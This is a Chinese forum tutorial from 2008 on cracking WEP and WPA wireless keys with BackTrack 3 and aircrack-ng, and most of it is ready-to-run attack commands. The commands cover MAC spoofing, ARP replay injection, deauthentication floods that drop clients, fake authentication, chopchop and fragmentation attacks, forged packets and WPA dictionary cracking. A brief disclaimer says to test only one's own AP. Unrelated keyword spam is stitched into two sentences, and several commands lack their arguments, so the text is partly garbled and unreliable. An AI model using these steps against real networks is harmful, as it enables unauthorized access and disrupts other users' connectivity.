中国无线门户 David98出品
Anywhere WLAN!! 1
BT3破解无线 WEP/WPA教程
中国无线门户 David98出品
Anywhere WLAN!! 2
声明:任何不经别人同意而进入别人网络都是非法和不道德的行为。
本教程用于学习和交流,如要实验请拿自已的 AP开刀!!
题记:
本人是中国无线门户 http://www.anywlan.com无线安全版块 ID
“David98”,首先感谢版主 longas还有像 liyg、hrb011011、wifi和小
草等众多热心坛友的支持。
无线安全版块一直是本坛一个特殊而重要的版块,本版高手如
云,各类无线破解教程纷呈,但一直缺乏一个系统、全面而可理解和
学习的教程。我根据各位坛友的教程和自己的理解整理编辑成这篇
《BT3破解无线WEP/WPA教程》。
由于本人也是初学者,缺乏专业的理论知识,因此文中不免存在理
解的偏差甚至错误,希望各位朋友指正。
最后希望更多的朋友参与到教程的整理和编辑中,不断把教程修
正和完善。
对无线WEP和WPA破解有兴趣的朋友也可加入 QQ群:
14121760一起交流。
谢谢!!
David98
08年 5月 22日
中国无线门户 David98出品
Anywhere WLAN!! 3
WEP破解
1.装备: IMBX60笔记本(内置 Intel3945无线网卡)、BT3的 U盘系统(需用 syslinux命令来指定启动
BT3的盘符)
2.用户名:root密码:toor,进入图形界面:startx。启动 BT3后,(启动黑屏:xconf再输入 startx)
3.加载 3945网卡的驱动。打开一个 shell
输入 modprobe –r iwl3945
输入 modprobe ipwraw
注:不同的网卡有不同的加载方式
4. 查找目标:
用 Airoscript命令(Backtrack/radio network analysis/80211/all/Aioscript)的扫描功能
连续三次都选择 1 发现 5个,有 4个加密,data都是 0,开放的 netgear那个 AP有一个客户端。PWR
值一般看出信号强度。也可以用 airodump-ng wifi0 来搜索
我们选择第一个作为目标,channel为 11(上图中的 CH代表信道)。
中国无线门户 David98出品
Anywhere WLAN!! 4
注:修改自己网卡的MAC地址的命令。
输入 macchanger –m 00:11:22:33:44:55 wifi0
5.激活网卡的Monitor模式并工作在 11信道。(加载网卡,激活监听模式,工作在 11信道)
输入 airmon-ng start wifi0 11 也可用 iwconfi wifi0来查看网卡的工作模式和工作信道。
可用 aireplay-ng --test wifi0来测试是否可以注入
中国无线门户 David98出品
Anywhere WLAN!! 5
6.输入截取数据包命令(截取 11信道的 ivs数据包,并保存名为 name.ivs)
输入命令 airodump-ng --ivs -w name -c 11 wifi0 ,
(--ivs:仅截取 ivs数据包,-w:写入文件,-c:截取 ivs的信道)
(其中 name是获取的 ivs的保存文件的名字,11是 channel值,你根据实际修改)
一. 有客户端WEP破解
1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量 IVS。
思路:1-6步同上
7.直接用 aircrack-ng破解
第七步: aircrack-ng -n 64 -b
name-01.ivs
中国无线门户 David98出品
Anywhere WLAN!! 6
2.有客户端,合法客户端只能产生少量 ivs 数据,就需要注入攻击加速产生大量 ivs。
只要有少量的数据就可能获得 arp请求包,则可用 arp注入模式的-3模式通过不断向 AP发送
同样的 arp请求包,来进行注入式攻击。
思路:1-6步同上
7.用 aireplay-ng的 arp注入方式获得大量的 ivs
第七步:aireplay-ng -3 -b -h <合法客户端 mac> wifi0
注:这一步可能时间会长一点,因为需要等到 ARP。
中国无线门户 David98出品
Anywhere WLAN!! 7
3.有客户端,但是客户端根本不在通信,不能产生 ARP包。-3注入模式不成功
思路:1-6步同上
7.-0冲突模式强制断开合法客户端和 ap连接,使之重新连接
8.利用-0冲突模式重新连接所产生的握手数据让-3获得有效的 ARP从而完成 ARP注入
第七步:aireplay-ng -3 -b -h <合法客户端 mac> wifi0
第八步:aireplay-ng -0 10 –a -c <合法客户端 mac> wifi0
中国无线门户 David98出品
Anywhere WLAN!! 8
4.有客户端,并且客户端能产生有效 arp数据的另类破解方式
前面的步骤一样:
输入 modprobe –r iwl3945
输入 modprobe ipwraw
输入 airmon-ng start wifi0 11
现在,只要一个命令就搞定,输入:
输入 wesside-ng -i wifi0 -v 01:02:03:04:05:06 (此格式的 AP MAC)。
很简单吧,密码出来了。
中国无线门户 David98出品
Anywhere WLAN!! 9
二.无客户端WEP破解
思路:1-6步同上
因为是无客户端,所以第一步就需要和 AP之间建立一个虚拟连接。
这是非常关键的一步。为让 AP接受数据包,必须使自己的网卡和 AP关联。如果没有关联的话,目标 AP
将忽略所有从你网卡发送的数据包,IVS数据将不会产生。
第七步:输入 aireplay-ng -1 0 -e -a -h < mac> wifi0
如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:
1、目标 AP做了MAC地址过滤
2、你离目标 AP物理距离太远
3、对方使用了WPA加密
5、网卡、AP可能不兼容,网卡没有使用和 AP一样的工作频道
也可以使用命令 tcpdump来确认网卡是否已经连接到目标 AP上
tcpdump -n -e -s0 -vvv -i wifi0
中国无线门户 David98出品
Anywhere WLAN!! 10
1.第一种破解方式:
思路:1-7步同上
建立虚拟连接后直接用-2交互攻击模式,这个模式集合了抓包和提取数据,发攻击包三种能力。
第八步:抓包,提数据和发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b -h wifi0
发包成功后可得到足够的 ivs,然后用 aircrack-ng破解。
成功后如上图截获了一个可以直接进行注入的数据包,并回显 Use this packet,按 y然后开始
发包攻击,date飞快涨。当获得足够的 ivs以后就可破解了。
中国无线门户 David98出品
Anywhere WLAN!! 11
2.第二种破解方式:
思路:1-7步同上
第八步:利用-5碎片攻击模式获得一个可用的包含密钥是数据文件(xor文件)
第九步:然后通过数据包制造程序 Packetforge-ng提取 xor文件中的 PRGA伪造一个 arp包,
第十步:最后利用交互式攻击模式-2发包攻击。
第八步:采用碎片包攻击模式-5,获得一个 PRGA数据包(xor文件)。
输入 aireplay-ng -5 -b -h wifi0
如顺利,将得到一个可利用的数据包如上图,系统将回显 Use this packet ? 输入 y 回车,将得到一个至
关重要的 xor文件。
再输入 ls 查看当前目录,你将看到刚才生成的一个后缀名为 xor 的文件。
中国无线门户 David98出品
Anywhere WLAN!! 12
第九步:用数据包制造程序 packetforge-ng将上面获得的 xor数据包伪造成可利用的 ARP注入包。
输入 packetforge-ng -0 -a -h -k 255.255.255.255 –l 255.255.255.255 -y
name-xor -w myarp
参数说明:
-y (filename)是用来读取 PRGA的文件
-w (filename)将 arp包写入文件,我用的文件名是myarp
系统回显:Wrote packet to: mrarp
中国无线门户 David98出品
Anywhere WLAN!! 13
第十步:采用交互模式-2,发包注入攻击。
输入 aireplay-ng -2 –r myarp -x 256 rausb0
【-r】:从指定文件中读取 arp数据包
【-x】:定义每秒发送的数据包数量。为避免网卡死机,可选择 256,最高不超过 1024
输入 y 回车 攻击开始
中国无线门户 David98出品
Anywhere WLAN!! 14
这时,前面的抓包窗口上的 data将迅速增加。
到数据增加到 1.5万以上时。
第十一步:采用 aircrack-ng 来进行破解
中国无线门户 David98出品
Anywhere WLAN!! 15
3.第三种破解方式:
思路:1-7步同上
第八步:利用-4的Chopchop攻击模式获得一个可用的包含密钥数据文件(xor文件)
第九步:通过数据包制造程序 Packetforge-ng提取 xor文件中的 PRGA伪造一个 arp包
第十步:最后利用交互式攻击模式-2发包攻击。
第八步:采用-4的 Chopchop攻击模式获得一个包含密钥数据的 xor文件
输入 aireplay-ng -4 -b -h wifi0
参数说明:
-b:设置需要破解的 AP的 mac
-h:设置用于连接的无线网卡的 mac(自己网卡)
顺利将得到一个可利用的数据包,按 y将利用此数据包生产一个 xor文件
如上图所示得到一个名为 replay_dec-0523-075615的 xor文件,
中国无线门户 David98出品
Anywhere WLAN!! 16
第九步:通过数据包制造程序 Packetforge-ng提取上面 xor文件来伪造一个 arp包
输入 packetforge-ng -0 -a -h -k 255.255.255.255 –l 255.255.255.255 -y
name-xor -w myarp
如上图,成功生成一个名为 myarp的可用来注入的 arp数据包。
第十步:最后利用交互式攻击模式-2发包攻击。
输入 aireplay-ng -2 -r myarp rausb0
发现了可利用的 myarp的数据包,按 y后,立刻注入攻击。Date疯涨
中国无线门户 David98出品
Anywhere WLAN!! 17
破 解 WPA
1、加载无线网卡驱动
2、设置网卡为在指定的 ap的工作频道的监控模式
这两部与前面相同
3、 输入截取数据包命令(截取 11信道的 cap数据包,并保存名为 12345.cap)
输入命令 airodump-ng -w 12345 -c 11 wifi0 ,
(-w:写入文件,-c:截取 cap的信道)
(其中 12345是获取的 cap的保存文件的名字, 11是 channel值,你根据实际修改。)
回车后可以看到是WPA-TIKP-PSK加密方式
中国无线门户 David98出品
Anywhere WLAN!! 18
4、进行-0的 Deauth验证攻击
这里为了便于WPA握手验证包的获取,必须进行 Deauth验证攻击,这个对于采用WPA验证的 AP攻击都
会用到,可以迫使 AP重新与已连接的合法客户端进行握手验证,重新握手验证过程中获得验证数据包。
输入: aireplay-ng -0 10 -a wifi0
或者输入:aireplay-ng -0 10 -a -c wifi0
解释:-0指的是采取 Deautenticate攻击方式,后面为发送次数。-c建议还是使用,效果会更好,这个后面
跟的是监测到的合法的已连接的客户端MAC地址,如上图中显示的。
这里注意,Deauth 攻击往往并不是一次攻击就成功,为确保成功截获需要反复进行,需要说明的是,攻击
期间很可能会导致该 AP的其它无线客户端无法正常上网即断网频繁,而且对于一些低端 AP可能会导致其
无线功能假死,无法 ping通,需重起。
是否获得包含WPA握手验证包的 Cap文件,需要在破解时进行验证,以上 Deauth攻击几次后可以做破解
尝试。WPA破解不用等到数据 Data达到几万,因为它只要一个包含WPA握手验证包就可以了,通过上面
的方法我们已经获得破解WPA所需的 cap文件。即可进行下一步的破解。
中国无线门户 David98出品
Anywhere WLAN!! 19
5、用得到的 CAP数据包以后进行WPA破解
破解方式一:用 Cap数据包直接暴力破解
从破解难度上讲WEP是很容易破解的,只要你收集足够的 Cap数据包就肯定可以破解。WPA的破解需要
有好的密码字典配合才能完成,复杂的WPA密码可能几个月也破解不出来。
1、WEP数据 Cap破解
输入:aircrack-ng -z –b 12345*.cap
12345是步骤 3中输入的 cap的文件名。系统会自动在你输入的文件名后加上-01、-02(如果数据包太多,
系统会自动分成几个文件存储并自动命名,可以使用 ls查看),输入 12345*是打开所有 1234相关的 cap文
件。
常见问题:步骤 3中收集数据包已达 30W,无法破解密码。可能系统自动分成了几个文件贮存 cap包。
如输入 name-01.cap破解可能导致破解不成功,建议使用 name*.cap选择所有的 cap包进行破
解。
中国无线门户 David98出品
Anywhere WLAN!! 20
破解方式二:WPA数据 Cap破解
输入:aircrack-ng –w password.txt –b 12345*.cap
(-w:是字典破解模式)
Password.txt是你事先准备好的字典。WPA密码破解必须使用字典破解模式。
技巧:可以在 windows下使用下载的字典工具生产字典,再在 BackTrack3下拷贝到/root下(aircrack默认
的工作目录在/root)。
请注意,破解WPA密码的时间取决于密码难易程度,字典包含程度,内存及 CPU等。多则数小时。也可
以把 CAP数据包拷贝出来在WIN下用WinAircrack破解。
注意点:
针 MAC 地址过滤问题: 因为 AP 只回应认证的的客户端. 用 airodump-ng搜索到刚刚连接上AP的
MAC地址,把自己的修改为这个MAC地址,就可以突破MAC地址过滤的 。
中国无线门户 David98出品
Anywhere WLAN!! 21
Aireplay-ng的 6种攻击模式详解
-0 Deautenticate冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,
从而产生有效 ARP request。
如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效 ARP
request。所以此时需要用-0 攻击模式配合,-3攻击才会被立刻激活。
aireplay-ng -0 10 –a -c wifi0
参数说明:
【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上
网)
【-a】:设置 ap的 mac
【-c】:设置已连接的合法客户端的 mac。如果不设置-c,则断开所有和 ap连接的合法客户端。
aireplay-ng -3 -b -h wifi0
注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器
-1 fakeauth count 伪装客户端连接
这种模式是伪装一个客户端和 AP进行连接。
这步是无客户端的破解的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。
为让 AP接受数据包,必须使自己的网卡和 AP关联。如果没有关联的话,目标 AP将忽略所有从你网卡发
送的数据包,IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注
入命令后才可反馈数据从而产生 ARP包。
aireplay-ng -1 0 –e -a -h wifi0
参数说明:
【-1】:伪装客户端连接模式,后面跟延时
【-e】:设置 ap的 essid
【-a】:设置 ap的 mac
【-h】:设置伪装客户端的网卡MAC(即自己网卡 mac)
-2 Interactive交互模式
这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式
1.这种模式主要用于破解无客户端,先用-1建立虚假客户端连接然后直接发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b -h wifi0
参数说明:
【-2】:交互攻击模式
【-p】设置控制帧中包含的信息(16进制),默认采用 0841
【-c】设置目标 mac地址
【-b】设置 ap的 mac地址
【-h】设置伪装客户端的网卡MAC(即自己网卡 mac)
2.提取包,发送注入数据包
aireplay-ng -2 –r -x 1024 wifi0
发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择 1024。
中国无线门户 David98出品
Anywhere WLAN!! 22
-3 ARP-request注入攻击模式
这种模式是一种抓包后
分析
定性数据统计分析pdf销售业绩分析模板建筑结构震害分析销售进度分析表京东商城竞争战略分析
重发的过程
这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客
户端那一般需要等几分钟,让合法客户端和 ap之间通信,少量数据就可产生有效 ARP request才可利用-3
模式注入成功。如果没有任何通信存在,不能得到 ARP request.,则这种攻击就会失败。如果合法客户端和
ap之间长时间内没有 ARP request,可以尝试同时使用-0 攻击。
如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生
有效 ARP request。再通过-3模式注入。
aireplay-ng -3 -b -h -x 512 wifi0
参数说明:
【-3】:arp注入攻击模式
【-b】:设置 ap的 mac
【-h】:设置
【-x】:定义每秒发送数据户包的数量,但是最高不超过 1024,建议使用 512(也可不定义)
-4 Chopchop攻击模式,用以获得一个包含密钥数据的 xor文件
这种模式主要是获得一个可利用包含密钥数据的 xor 文件,不能用来解密数据包。而是用它来产生一个新
的数据包以便我们可以进行注入。
aireplay-ng -4 -b -h wifi0
参数说明:
-b:设置需要破解的 AP的 mac
-h:设置虚拟伪装连接的 mac(即自己网卡的 mac)
-5 fragment碎片包攻击模式 用以获得 PRGA(包含密钥的后缀为 xor的文件)
这种模式主要是获得一个可利用 PRGA,这里的 PRGA并不是 wep key数据,不能用来解密数据包。而是
用它来产生一个新的数据包以便我们可以进行注入。其
工作原理
数字放映机工作原理变压器基本工作原理叉车的结构和工作原理袋收尘器工作原理主动脉球囊反搏护理
就是使目标 AP重新广播包,当 AP重广播
时,一个新的 IVS将产生,我们就是利用这个来破解
aireplay-ng -5 -b -h wifi0
【-5】:碎片包攻击模式
【-b】:设置 ap的 mac
【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)
中国无线门户 David98出品
Anywhere WLAN!! 23
Packetforge-ng:数据包制造程序
Packetforge-ng
Mode
【-0】:伪造 ARP包
packetforge-ng -0 -a -h wifi0 –k 255.255.255.255 -l 255.255.255.255
–y<.xor file> -w mrarp
参数说明:
【-0】:伪装 arp数据包
【-a】:设置 ap的 mac
【-h】设置虚拟伪装连接的 mac(即自己的 mac)
【-k】说明:设置目标文件 IP和端口
【-l】说明:设置源文件 IP和端口
【-y】说明:从 xor文件中读取 PRGA。后面跟 xor的文件名。
【-w】设置伪装的 arp包的文件名
Aircrack-ng:WEP 及 WPA-PSK key 破解主程序
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b name-01.ivs
参数说明:
【-n】:设置WEP KEY 长度(64/128/152/256/512)
aircrack-ng -x -f 2 name-01h.cap
参数说明:
【-x】:设置为暴力破解模式
【-f】:设置复杂程度,wep密码设置为 1,wpa密码设置为 2
aircrack-ng -w password.txt ciw.cap
【-w】:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到 WPA验证的抓包
文件。
中国无线门户 David98出品
Anywhere WLAN!! 24
常见问题荟萃
问题 1:我在启动 bt3的时候,输入 startx黑屏
解答:在输入用户名 root和密码 toor以后输入 xconf这时会黑屏一会,然后出来提示符再输入 startx可进入
win窗口;当实在不能进入 win窗口的时候你也可以直接在提示符下输入各破解命令,同时可用 alt+f1打开
一个 shell,alt+f2打开第二个 shell,alt+f3打开第三个等。关闭窗口用 PRINT SCREEN键
问题 2:在 BT3中打开 kismet的时候窗口一闪就没了。
解答:首先加载驱 ifconfig -a rausb0开始网卡监听:airmon-ng start rausb0。找到/usr/local/etc/kismet.conf
打开此文件在 channelsplit=true下面加入一行 source=rt2500,rausb0,moniter
注: wusb54g v4一定是 rt2500 ,不是加载驱动时显示的 rt2570。
3945的兄弟加入 source=ipw3945,eth0,IPW3945
问题 3: